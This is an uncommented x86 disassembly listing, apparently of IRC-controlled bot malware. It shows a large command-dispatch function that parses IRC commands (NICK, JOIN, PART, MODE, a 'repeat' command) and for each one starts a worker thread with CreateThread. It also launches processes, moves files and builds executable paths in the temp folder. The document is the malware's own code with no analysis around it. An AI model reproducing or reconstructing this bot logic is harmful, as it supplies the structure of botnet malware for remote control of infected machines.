push [ebp+4Ch+var_8]
mov [ebp+4Ch+var_3080], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_307C], eax
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42D518
push eax
mov [ebp+4Ch+var_3288], esi
call sub_41E6A6
add esp, 44h
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 0Eh
push eax
call sub_40AE85
add esp, 0Ch
mov [ebp+4Ch+var_3084], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_3288]
push eax
push offset loc_4167D6
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_3084]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_4088C9
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42D4E0
jmp loc_4089B1
; ---------------------------------------------------------------------------
loc_4088C1: ; CODE XREF: sub_40274D+6182�j
push 32h
call ds:dword_42B014 ; Sleep
loc_4088C9: ; CODE XREF: sub_40274D+6161�j
cmp [ebp+4Ch+var_3078], ebx
jz short loc_4088C1
jmp loc_4089C0
; ---------------------------------------------------------------------------
loc_4088D6: ; CODE XREF: sub_40274D+497E�j
; sub_40274D+4995�j ...
push 7Fh
pop esi
push esi
push [ebp+4Ch+var_8]
lea eax, [ebp+4Ch+var_3F88]
push eax
call sub_41E860
push esi
lea eax, [ebp+4Ch+var_3F08]
push edi
push eax
call sub_41E860
push esi
push [ebp+4Ch+arg_0]
lea eax, [ebp+4Ch+var_3E88]
push eax
call sub_41E860
push esi
push [ebp+4Ch+var_9C]
lea eax, [ebp+4Ch+var_3E08]
push eax
call sub_41E860
push 20h
push [ebp+4Ch+var_10]
lea eax, [ebp+4Ch+var_3D88]
push eax
call sub_41E860
push [ebp+4Ch+arg_0]
mov eax, [ebp+4Ch+var_4]
mov esi, [ebp+4Ch+arg_4]
push edi
push [ebp+4Ch+var_8]
mov [ebp+4Ch+var_3D08], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_3D04], eax
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42D4B0
push eax
mov [ebp+4Ch+var_3F90], esi
call sub_41E6A6
add esp, 50h
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 0Dh
push eax
call sub_40AE85
add esp, 0Ch
mov [ebp+4Ch+var_3F8C], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_3F90]
push eax
push offset loc_415BD8
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_3F8C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_4089E5
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42D478
loc_4089B1: ; CODE XREF: sub_40274D+4BA1�j
; sub_40274D+54C7�j ...
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41E6A6
add esp, 0Ch
loc_4089C0: ; CODE XREF: sub_40274D+4BB6�j
; sub_40274D+54DC�j ...
cmp [ebp+4Ch+var_C], ebx
jnz loc_408D10
push ebx
push [ebp+4Ch+var_4]
loc_4089CD: ; CODE XREF: sub_40274D+21E7�j
lea eax, [ebp+4Ch+var_2D0]
push eax
push [ebp+4Ch+var_9C]
push esi
jmp loc_4069A7
; ---------------------------------------------------------------------------
loc_4089DD: ; CODE XREF: sub_40274D+629E�j
push 32h
call ds:dword_42B014 ; Sleep
loc_4089E5: ; CODE XREF: sub_40274D+6256�j
cmp [ebp+4Ch+var_3D00], ebx
jz short loc_4089DD
jmp short loc_4089C0
; ---------------------------------------------------------------------------
loc_4089EF: ; CODE XREF: sub_40274D+4950�j
; sub_40274D+4967�j
push 7Fh
push [ebp+4Ch+var_8]
lea eax, [ebp+4Ch+var_1780]
push eax
call sub_41E860
push edi
call sub_41E7AD
push 3Fh
push [ebp+4Ch+arg_0]
mov [ebp+4Ch+var_1630], eax
lea eax, [ebp+4Ch+var_1700]
push eax
call sub_41E860
mov esi, [ebp+esi+4Ch+var_94]
add esp, 1Ch
cmp esi, ebx
jz short loc_408A3A
push 3Fh
lea eax, [ebp+4Ch+var_16C0]
push esi
push eax
call sub_41E860
add esp, 0Ch
loc_408A3A: ; CODE XREF: sub_40274D+62D9�j
lea eax, [ebp+4Ch+var_1700]
push eax
push [ebp+4Ch+var_1630]
lea eax, [ebp+4Ch+var_1780]
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset dword_42D448
push eax
mov [ebp+4Ch+var_162C], 1
call sub_41E6A6
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 1Fh
push eax
call sub_40AE85
add esp, 20h
mov [ebp+4Ch+var_1628], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_1784]
push eax
push offset sub_4025EF
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_1628]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_408AC9
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset dword_42D40C
jmp loc_4076D4
; ---------------------------------------------------------------------------
loc_408AC1: ; CODE XREF: sub_40274D+6382�j
push 32h
call ds:dword_42B014 ; Sleep
loc_408AC9: ; CODE XREF: sub_40274D+6361�j
cmp [ebp+4Ch+var_1624], ebx
jz short loc_408AC1
jmp loc_406C4D
; ---------------------------------------------------------------------------
loc_408AD6: ; CODE XREF: sub_40274D+4913�j
; sub_40274D:loc_407077�j
push edi
call sub_41E7AD
cmp eax, ebx
pop ecx
mov [ebp+4Ch+var_1D6C], eax
jle loc_408BC3
push [ebp+4Ch+var_8]
mov esi, 80h
lea eax, [ebp+4Ch+var_1EF4]
push esi
push eax
call sub_41E6FE
push [ebp+4Ch+var_9C]
xor eax, eax
cmp [ebp+4Ch+var_8F6], bl
push esi
setnz al
mov [ebp+4Ch+var_1D68], eax
mov eax, [ebp+4Ch+arg_4]
mov [ebp+4Ch+var_1EF8], eax
lea eax, [ebp+4Ch+var_1DF4]
push eax
call sub_41E6FE
mov eax, [ebp+4Ch+var_4]
push edi
push [ebp+4Ch+var_8]
mov [ebp+4Ch+var_1D64], eax
mov eax, [ebp+4Ch+var_C]
push offset unk_42D3E0
mov [ebp+4Ch+var_1D60], eax
lea eax, [ebp+4Ch+var_2D0]
push 200h
push eax
call sub_41E6FE
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 15h
push eax
call sub_40AE85
add esp, 38h
mov [ebp+4Ch+var_1D74], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_1EF8]
push eax
push offset loc_415C89
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_1D74]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_408BB6
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42D3A8
jmp loc_40697E
; ---------------------------------------------------------------------------
loc_408BAE: ; CODE XREF: sub_40274D+646F�j
push 32h
call ds:dword_42B014 ; Sleep
loc_408BB6: ; CODE XREF: sub_40274D+644E�j
cmp [ebp+4Ch+var_1D5C], ebx
jz short loc_408BAE
jmp loc_40698D
; ---------------------------------------------------------------------------
loc_408BC3: ; CODE XREF: sub_40274D+6398�j
push offset unk_42D370
jmp loc_4078C9
; ---------------------------------------------------------------------------
loc_408BCD: ; CODE XREF: sub_40274D+48E5�j
; sub_40274D+48FC�j
push edi
push [ebp+4Ch+var_8]
call ds:dword_42B034 ; MoveFileA
test eax, eax
jz short loc_408BFD
push edi
push [ebp+4Ch+var_8]
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42D34C
push 200h
push eax
call sub_41E6FE
loc_408BF5: ; CODE XREF: sub_40274D+2407�j
add esp, 14h
jmp loc_40698D
; ---------------------------------------------------------------------------
loc_408BFD: ; CODE XREF: sub_40274D+648C�j
push offset dword_42D340
call sub_41ACD0
push eax
lea eax, [ebp+4Ch+var_2D0]
push 200h
push eax
call sub_41E6FE
add esp, 10h
jmp loc_40698D
; ---------------------------------------------------------------------------
loc_408C21: ; CODE XREF: sub_40274D+48B7�j
; sub_40274D+48CE�j
push [ebp+4Ch+var_8]
lea eax, [ebp+4Ch+var_3C78]
push 104h
push eax
call sub_41E6FE
add esp, 0Ch
cmp [ebp+4Ch+var_18], ebx
jz short loc_408C5B
push edi
push [ebp+4Ch+var_18]
call sub_41F090
cmp eax, ebx
pop ecx
pop ecx
jz short loc_408C5B
push eax
lea eax, [ebp+4Ch+var_3B74]
push eax
call sub_41E6A6
pop ecx
pop ecx
loc_408C5B: ; CODE XREF: sub_40274D+64EE�j
; sub_40274D+64FD�j
push [ebp+4Ch+var_9C]
lea eax, [ebp+4Ch+var_3CF8]
push 80h
push eax
call sub_41E6FE
mov eax, [ebp+4Ch+arg_4]
mov [ebp+4Ch+var_3CFC], eax
mov eax, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_3A6C], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_3A68], eax
lea eax, [ebp+4Ch+var_3B74]
push eax
lea eax, [ebp+4Ch+var_3C78]
push eax
push offset unk_42D310
lea eax, [ebp+4Ch+var_2D0]
push 200h
push eax
call sub_41E6FE
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 24h
push eax
call sub_40AE85
add esp, 2Ch
mov [ebp+4Ch+var_3A70], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_3CFC]
push eax
push offset byte_4198EB
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_3A70]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_408D20
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42D2D4
loc_408D01: ; CODE XREF: sub_40274D+731�j
; sub_40274D+963�j ...
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41E6A6
add esp, 0Ch
loc_408D10: ; CODE XREF: sub_40274D+84A�j
; sub_40274D+86E�j ...
xor esi, esi
inc esi
jmp loc_406C6E
; ---------------------------------------------------------------------------
loc_408D18: ; CODE XREF: sub_40274D+65D9�j
push 32h
call ds:dword_42B014 ; Sleep
loc_408D20: ; CODE XREF: sub_40274D+65A6�j
cmp [ebp+4Ch+var_3A64], ebx
jz short loc_408D18
jmp short loc_408D10
; ---------------------------------------------------------------------------
loc_408D2A: ; CODE XREF: sub_40274D+4889�j
; sub_40274D+48A0�j
push 44h
pop esi
push esi
lea eax, [ebp+4Ch+var_670]
push ebx
push eax
call sub_41E5F0
push [ebp+4Ch+var_8]
mov [ebp+4Ch+var_670], esi
xor esi, esi
inc esi
mov [ebp+4Ch+var_644], esi
mov [ebp+4Ch+var_640], bx
call sub_41E7AD
add esp, 10h
cmp eax, esi
jnz short loc_408D69
mov [ebp+4Ch+var_640], 5
loc_408D69: ; CODE XREF: sub_40274D+6611�j
cmp [ebp+4Ch+var_18], ebx
jz loc_406C4D
push edi
push [ebp+4Ch+var_18]
call sub_41F090
mov edi, eax
cmp edi, ebx
pop ecx
pop ecx
jz loc_406C4D
lea eax, [ebp+4Ch+var_D98]
push eax
lea eax, [ebp+4Ch+var_670]
push eax
push ebx
push ebx
push 28h
push esi
push ebx
push ebx
push edi
push ebx
call ds:dword_42B008 ; CreateProcessA
test eax, eax
lea eax, [ebp+4Ch+var_2D0]
jnz short loc_408DB8
push offset unk_42D2B0
jmp loc_406C45
; ---------------------------------------------------------------------------
loc_408DB8: ; CODE XREF: sub_40274D+665F�j
push edi
push offset dword_42D294
jmp loc_4076DA
; ---------------------------------------------------------------------------
loc_408DC3: ; CODE XREF: sub_40274D+485B�j
; sub_40274D+4872�j
push edi
push offset aIiknc ; "iiKnc"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_408F2F
lea eax, [ebp+4Ch+var_48F8]
push eax
push 104h
call ds:dword_42B030 ; GetTempPathA
push 0FFh
push [ebp+4Ch+var_8]
lea eax, [ebp+4Ch+var_25D8]
push eax
call sub_41E860
lea eax, [ebp+4Ch+var_17A0]
push eax
call sub_40A8CA
push eax
lea eax, [ebp+4Ch+var_48F8]
push eax
lea eax, [ebp+4Ch+var_24D8]
push offset aSS_exe ; "%s%s.exe"
push eax
call sub_41E6A6
mov eax, [ebp+esi+4Ch+var_98]
add esp, 20h
cmp eax, ebx
mov [ebp+4Ch+var_23D4], 1
mov [ebp+4Ch+var_23D0], ebx
jz short loc_408E52
push 10h
push ebx
push eax
call sub_41EC61
add esp, 0Ch
mov [ebp+4Ch+var_23C8], eax
jmp short loc_408E58
; ---------------------------------------------------------------------------
loc_408E52: ; CODE XREF: sub_40274D+66EF�j
mov [ebp+4Ch+var_23C8], ebx
loc_408E58: ; CODE XREF: sub_40274D+6703�j
mov esi, [ebp+esi+4Ch+var_94]
cmp esi, ebx
jz short loc_408E6F
push esi
call sub_41E7AD
pop ecx
mov [ebp+4Ch+var_23CC], eax
jmp short loc_408E75
; ---------------------------------------------------------------------------
loc_408E6F: ; CODE XREF: sub_40274D+6711�j
mov [ebp+4Ch+var_23CC], ebx
loc_408E75: ; CODE XREF: sub_40274D+6720�j
movzx eax, [ebp+4Ch+var_903]
mov esi, [ebp+4Ch+arg_4]
push 7Fh
push [ebp+4Ch+var_9C]
mov [ebp+4Ch+var_23C4], eax
lea eax, [ebp+4Ch+var_2658]
push eax
mov [ebp+4Ch+var_265C], esi
call sub_41E860
mov eax, [ebp+4Ch+var_4]
push [ebp+4Ch+var_8]
mov [ebp+4Ch+var_23BC], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_23C0], eax
lea eax, [ebp+4Ch+var_2D0]
push offset dword_42D25C
push eax
call sub_41E6A6
push esi
lea eax, [ebp+4Ch+var_2D0]
push 1Eh
push eax
call sub_40AE85
add esp, 24h
mov [ebp+4Ch+var_23D8], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_265C]
push eax
push offset dword_418F38
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_23D8]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_408F22
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset dword_42D220
jmp loc_4076D4
; ---------------------------------------------------------------------------
loc_408F1A: ; CODE XREF: sub_40274D+67DB�j
push 32h
call ds:dword_42B014 ; Sleep
loc_408F22: ; CODE XREF: sub_40274D+67BA�j
cmp [ebp+4Ch+var_23B8], ebx
jz short loc_408F1A
jmp loc_406C4D
; ---------------------------------------------------------------------------
loc_408F2F: ; CODE XREF: sub_40274D+6685�j
push offset dword_42D1D8
jmp loc_406C3F
; ---------------------------------------------------------------------------
loc_408F39: ; CODE XREF: sub_40274D+482D�j
; sub_40274D+4844�j
push [ebp+4Ch+var_A0]
push offset dword_42FBF4
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_402B92
cmp [ebp+4Ch+var_18], ebx
jz loc_402B92
push edi
push [ebp+4Ch+var_18]
call sub_41F090
push eax
push [ebp+4Ch+var_9C]
lea eax, [ebp+4Ch+var_2D0]
push [ebp+4Ch+var_A0]
push [ebp+4Ch+var_A4]
push offset aSSSS ; "%s %s %s :%s"
push eax
call sub_41E6A6
push 1FFh
lea eax, [ebp+4Ch+var_2D0]
push eax
push [ebp+4Ch+arg_0]
call sub_41E860
push [ebp+4Ch+var_8]
call sub_41E7AD
add esp, 30h
test eax, eax
jle short loc_408FB6
push [ebp+4Ch+var_8]
call sub_41E7AD
imul eax, 3E8h
pop ecx
push eax
call ds:dword_42B014 ; Sleep
loc_408FB6: ; CODE XREF: sub_40274D+6851�j
push offset dword_42D1B0
call sub_417D70
mov eax, [ebp+4Ch+arg_24]
pop ecx
inc eax
jmp loc_402B95
; ---------------------------------------------------------------------------
loc_408FCA: ; CODE XREF: sub_40274D+47FF�j
; sub_40274D+4816�j
push [ebp+4Ch+var_A0]
push offset dword_42FBF4
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_402B92
cmp [ebp+4Ch+var_18], ebx
jz loc_404979
push edi
push [ebp+4Ch+var_18]
call sub_41F090
push offset aRepeat ; "repeat"
inc edi
push edi
mov esi, eax
call sub_41E990
add esp, 10h
test eax, eax
push esi
lea eax, [ebp+4Ch+var_2D0]
jz short loc_409079
push [ebp+4Ch+var_9C]
push [ebp+4Ch+var_A0]
push [ebp+4Ch+var_A4]
push offset aSSSS ; "%s %s %s :%s"
push eax
call sub_41E6A6
push 1FFh
lea eax, [ebp+4Ch+var_2D0]
push eax
push [ebp+4Ch+arg_0]
call sub_41E860
push esi
lea eax, [ebp+4Ch+var_2D0]
push offset dword_42D198
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_417D70
push [ebp+4Ch+var_8]
call sub_41E7AD
add esp, 38h
test eax, eax
jle loc_404979
push [ebp+4Ch+var_8]
call sub_41E7AD
add eax, [ebp+4Ch+arg_24]
pop ecx
jmp loc_402B95
; ---------------------------------------------------------------------------
loc_409079: ; CODE XREF: sub_40274D+68C0�j
push offset unk_42D164
jmp loc_409887
; ---------------------------------------------------------------------------
loc_409083: ; CODE XREF: sub_40274D+47D1�j
; sub_40274D+47E8�j
push 7Fh
push [ebp+4Ch+var_8]
lea eax, [ebp+4Ch+var_2088]
push eax
call sub_41E860
push 7Fh
lea eax, [ebp+4Ch+var_2008]
push edi
push eax
call sub_41E860
push 7Fh
push [ebp+4Ch+var_9C]
lea eax, [ebp+4Ch+var_1F88]
push eax
call sub_41E860
mov eax, [ebp+4Ch+var_4]
mov esi, [ebp+4Ch+arg_4]
push edi
push [ebp+4Ch+var_8]
mov [ebp+4Ch+var_1F04], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_1F00], eax
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42D130
push eax
mov [ebp+4Ch+var_208C], esi
call sub_41E6A6
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 0Fh
push eax
call sub_40AE85
add esp, 40h
mov [ebp+4Ch+var_1F08], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_208C]
push eax
push offset loc_4171BC
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_1F08]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_409144
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42D0F4
jmp loc_409205
; ---------------------------------------------------------------------------
loc_40913C: ; CODE XREF: sub_40274D+69FD�j
push 32h
call ds:dword_42B014 ; Sleep
loc_409144: ; CODE XREF: sub_40274D+69DC�j
cmp [ebp+4Ch+var_1EFC], ebx
jz short loc_40913C
jmp loc_409214
; ---------------------------------------------------------------------------
loc_409151: ; CODE XREF: sub_40274D+47A3�j
; sub_40274D+47BA�j
push 7Fh
push [ebp+4Ch+var_8]
lea eax, [ebp+4Ch+var_23B0]
push eax
call sub_41E860
push 7Fh
lea eax, [ebp+4Ch+var_2330]
push edi
push eax
call sub_41E860
push 7Fh
push [ebp+4Ch+var_9C]
lea eax, [ebp+4Ch+var_22B0]
push eax
call sub_41E860
mov eax, [ebp+4Ch+var_4]
mov esi, [ebp+4Ch+arg_4]
push edi
push [ebp+4Ch+var_8]
mov [ebp+4Ch+var_222C], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_2228], eax
lea eax, [ebp+4Ch+var_2D0]
push offset dword_42D0C8
push eax
mov [ebp+4Ch+var_23B4], esi
call sub_41E6A6
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 11h
push eax
call sub_40AE85
add esp, 40h
mov [ebp+4Ch+var_2230], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_23B4]
push eax
push offset loc_416A7E
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_2230]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_409239
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset dword_42D08C
loc_409205: ; CODE XREF: sub_40274D+69EA�j
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41E6A6
add esp, 0Ch
loc_409214: ; CODE XREF: sub_40274D+69FF�j
; sub_40274D+6AF4�j
cmp [ebp+4Ch+var_C], ebx
jnz loc_404A79
push ebx
push [ebp+4Ch+var_4]
lea eax, [ebp+4Ch+var_2D0]
push eax
push [ebp+4Ch+var_9C]
push esi
jmp loc_404A71
; ---------------------------------------------------------------------------
loc_409231: ; CODE XREF: sub_40274D+6AF2�j
push 32h
call ds:dword_42B014 ; Sleep
loc_409239: ; CODE XREF: sub_40274D+6AAA�j
cmp [ebp+4Ch+var_2224], ebx
jz short loc_409231
jmp short loc_409214
; ---------------------------------------------------------------------------
loc_409243: ; CODE XREF: sub_40274D+4775�j
; sub_40274D+478C�j
push edi
lea eax, [ebp+4Ch+var_2D0]
push offset aPartS_0 ; "PART %s"
push eax
call sub_41E6A6
push [ebp+4Ch+var_8]
call sub_41E7AD
add esp, 10h
loc_409260: ; CODE XREF: sub_40274D+6B55�j
test eax, eax
jle loc_404979
push [ebp+4Ch+var_8]
call sub_41E7AD
cmp eax, 400h
pop ecx
jge loc_404979
jmp loc_409DC3
; ---------------------------------------------------------------------------
loc_409281: ; CODE XREF: sub_40274D+4747�j
; sub_40274D+475E�j
push [ebp+esi+4Ch+var_98]
lea eax, [ebp+4Ch+var_2D0]
push edi
push offset aJoinSS_0 ; "JOIN %s %s"
push eax
call sub_41E6A6
push [ebp+4Ch+var_8]
call sub_41E7AD
add esp, 14h
jmp short loc_409260
; ---------------------------------------------------------------------------
loc_4092A4: ; CODE XREF: sub_40274D+4719�j
; sub_40274D+4730�j
push edi
lea eax, [ebp+4Ch+var_2D0]
push offset aNickS_0 ; "NICK %s"
push eax
call sub_41E6A6
mov esi, [ebp+4Ch+var_8]
push esi
call sub_41E7AD
add esp, 10h
test eax, eax
jle loc_404979
push esi
call sub_41E7AD
cmp eax, 400h
pop ecx
jge loc_404979
lea eax, [ebp+4Ch+var_2D0]
push eax
push offset aS_0 ; "%s\r\n"
push esi
call sub_41E7AD
imul eax, 234h
pop ecx
push ds:dword_4444F4[eax]
call sub_4011F5
push edi
push esi
push offset dword_42D054
jmp loc_409FB1
; ---------------------------------------------------------------------------
loc_40930C: ; CODE XREF: sub_40274D+46EB�j
; sub_40274D+4702�j
cmp [ebp+4Ch+var_18], ebx
jz loc_404979
push edi
push [ebp+4Ch+var_18]
call sub_41F090
mov esi, eax
cmp esi, ebx
pop ecx
pop ecx
jz short loc_40933B
push esi
lea eax, [ebp+4Ch+var_2D0]
push offset aModeS ; "MODE %s"
push eax
call sub_41E6A6
add esp, 0Ch
loc_40933B: ; CODE XREF: sub_40274D+6BD7�j
mov edi, [ebp+4Ch+var_8]
push edi
call sub_41E7AD
test eax, eax
pop ecx
jle loc_404979
push edi
call sub_41E7AD
cmp eax, 400h
pop ecx
jge loc_404979
lea eax, [ebp+4Ch+var_2D0]
push eax
push offset aS_0 ; "%s\r\n"
push edi
call sub_41E7AD
imul eax, 234h
pop ecx
push ds:dword_4444F4[eax]
call sub_4011F5
push esi
push edi
push offset dword_42D030
jmp loc_409FB1
; ---------------------------------------------------------------------------
loc_40938F: ; CODE XREF: sub_40274D+46BD�j
; sub_40274D+46D4�j
cmp [ebp+4Ch+var_18], ebx
jz loc_404979
push edi
push [ebp+4Ch+var_18]
call sub_41F090
mov esi, eax
cmp esi, ebx
pop ecx
pop ecx
jz loc_404979
mov edi, [ebp+4Ch+var_8]
push edi
call sub_41E7AD
test eax, eax
pop ecx
jle loc_404979
push edi
call sub_41E7AD
cmp eax, 400h
pop ecx
jge loc_404979
push esi
push offset aS_0 ; "%s\r\n"
push edi
call sub_41E7AD
imul eax, 234h
pop ecx
push ds:dword_4444F4[eax]
call sub_4011F5
push esi
push edi
push offset dword_42D014
jmp loc_409FB1
; ---------------------------------------------------------------------------
loc_4093FB: ; CODE XREF: sub_40274D+468F�j
; sub_40274D+46A6�j
cmp [ebp+4Ch+var_18], ebx
jz loc_404979
push [ebp+4Ch+var_8]
push [ebp+4Ch+var_18]
call sub_41F090
mov esi, eax
cmp esi, ebx
pop ecx
pop ecx
jz loc_404979
push esi
push offset aModeS_0 ; "MODE %s\r\n"
push [ebp+4Ch+arg_4]
call sub_4011F5
push esi
push offset unk_42CFEC
jmp loc_409FD6
; ---------------------------------------------------------------------------
loc_409434: ; CODE XREF: sub_40274D+4661�j
; sub_40274D+4678�j
push [ebp+4Ch+var_A0]
push offset dword_42FBF4
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_402B92
push edi
push offset aPartS_1 ; "PART %s\r\n"
push [ebp+4Ch+arg_4]
call sub_4011F5
push [ebp+4Ch+var_8]
call sub_41E7AD
imul eax, 3E8h
add esp, 10h
push eax
call ds:dword_42B014 ; Sleep
push [ebp+esi+4Ch+var_98]
push edi
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+4Ch+arg_4]
call sub_4011F5
push offset dword_42CFCC
call sub_417D70
jmp loc_409FDB
; ---------------------------------------------------------------------------
loc_409492: ; CODE XREF: sub_40274D+4633�j
; sub_40274D+464A�j
cmp [ebp+4Ch+var_18], ebx
jz loc_404979
push [ebp+4Ch+var_8]
call sub_41E1C0
push [ebp+4Ch+var_10]
mov esi, eax
call sub_41E1C0
add eax, [ebp+4Ch+var_18]
push edi
lea eax, [eax+esi+2]
push eax
call sub_41F090
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_404979
push esi
lea eax, [ebp+4Ch+var_2D0]
push offset dword_42D704
push eax
call sub_41E6A6
push ebx
push ebx
lea eax, [ebp+4Ch+var_2D0]
push eax
push [ebp+4Ch+var_8]
push [ebp+4Ch+arg_4]
call sub_40123B
push esi
push [ebp+4Ch+var_8]
push offset unk_42CFB0
call sub_417DE4
add esp, 2Ch
jmp loc_404979
; ---------------------------------------------------------------------------
loc_409504: ; CODE XREF: sub_40274D+4605�j
; sub_40274D+461C�j
cmp [ebp+4Ch+var_18], ebx
jz loc_404979
push [ebp+4Ch+var_8]
call sub_41E1C0
push [ebp+4Ch+var_10]
mov esi, eax
call sub_41E1C0
add eax, [ebp+4Ch+var_18]
push edi
lea eax, [eax+esi+2]
push eax
call sub_41F090
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_404979
push ebx
push ebx
push esi
push [ebp+4Ch+var_8]
push [ebp+4Ch+arg_4]
call sub_40123B
push esi
push [ebp+4Ch+var_8]
push offset unk_42CF90
call sub_417DE4
add esp, 20h
jmp loc_404979
; ---------------------------------------------------------------------------
loc_40955E: ; CODE XREF: sub_40274D+45D7�j
; sub_40274D+45EE�j
cmp [ebp+4Ch+var_18], ebx
jz loc_402B92
push edi
push [ebp+4Ch+var_18]
call sub_41F090
cmp eax, ebx
pop ecx
pop ecx
jz loc_402B92
push eax
push [ebp+4Ch+var_8]
call sub_417C78
push [ebp+4Ch+var_8]
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42CF70
push eax
call sub_41E6A6
add esp, 14h
jmp loc_404A5B
; ---------------------------------------------------------------------------
loc_40959F: ; CODE XREF: sub_40274D+45A9�j
; sub_40274D+45C0�j
push edi
push [ebp+4Ch+var_8]
push [ebp+4Ch+var_4]
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_41B065
loc_4095B1: ; CODE XREF: sub_40274D+2435�j
add esp, 14h
jmp loc_402B92
; ---------------------------------------------------------------------------
loc_4095B9: ; CODE XREF: sub_40274D+456E�j
; sub_40274D+4583�j
push [ebp+4Ch+var_8]
push [ebp+4Ch+arg_1C]
call sub_41F090
test eax, eax
pop ecx
pop ecx
jz loc_404979
mov esi, [ebp+esi+4Ch+var_9C]
cmp esi, ebx
jz short loc_409648
push esi
push [ebp+4Ch+var_18]
call sub_41F090
mov esi, eax
cmp esi, ebx
pop ecx
pop ecx
lea eax, [ebp+4Ch+var_2D0]
jz short loc_409636
push esi
push [ebp+4Ch+var_9C]
push [ebp+4Ch+var_A0]
push [ebp+4Ch+var_A4]
push offset aSSSS ; "%s %s %s :%s"
push eax
call sub_41E6A6
push 1FFh
lea eax, [ebp+4Ch+var_2D0]
push eax
push [ebp+4Ch+arg_0]
call sub_41E860
push esi
push [ebp+4Ch+var_8]
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42CF48
push eax
call sub_41E6A6
add esp, 34h
inc [ebp+4Ch+arg_24]
jmp loc_4099EE
; ---------------------------------------------------------------------------
loc_409636: ; CODE XREF: sub_40274D+6E9E�j
push offset unk_42CF18
push eax
call sub_41E6A6
pop ecx
pop ecx
jmp loc_4099EE
; ---------------------------------------------------------------------------
loc_409648: ; CODE XREF: sub_40274D+6E87�j
push ebx
push [ebp+4Ch+var_4]
lea eax, [ebp+4Ch+var_2D0]
push [ebp+4Ch+arg_4]
push [ebp+4Ch+arg_1C]
push eax
call sub_41D9E5
add esp, 0Ch
push eax
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40123B
push [ebp+4Ch+var_8]
lea eax, [ebp+4Ch+var_2D0]
push offset dword_42CEFC
push 200h
push eax
call sub_41E6FE
add esp, 24h
jmp loc_4099EE
; ---------------------------------------------------------------------------
loc_40968E: ; CODE XREF: sub_40274D+4544�j
; sub_40274D+4559�j
